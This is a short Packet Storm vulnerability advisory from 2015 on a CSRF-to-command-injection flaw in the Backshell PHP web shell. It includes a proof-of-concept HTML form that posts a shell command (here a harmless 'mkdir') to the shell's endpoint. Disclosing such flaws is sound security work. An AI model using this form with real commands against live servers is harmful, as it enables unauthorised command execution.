Backshell Web Shell Cross Site Request Forgery

2015-12-25T00:00:00
ID PACKETSTORM:135072
Type packetstorm
Reporter Ehsan Hosseini
Modified 2015-12-25T00:00:00

Description

                                        
                                            `================================================================================  
# Backshell Web Shell - CSRF Command Injection  
================================================================================  
# Vendor Homepage: https://github.com/neitanod/backshell  
# Date: 25/12/2015  
# Software Link: https://github.com/neitanod/backshell/archive/master.zip  
# Author: Ashiyane Digital Security Team  
# Contact: hehsan979@gmail.com  
# Source: http://ehsansec.ir/advisories/bshell-csrf-rce.txt  
================================================================================  
# Exploit :  
  
<form action="http://localhost/a/bshell.php" method="post">  
<input type="hidden" name="cmd" value="mkdir ehsan">  
<input type="submit" value="submit">  
</form>  
  
  
================================================================================  
# Discovered By : Ehsan Hosseini (EhsanSec.ir)  
================================================================================  
`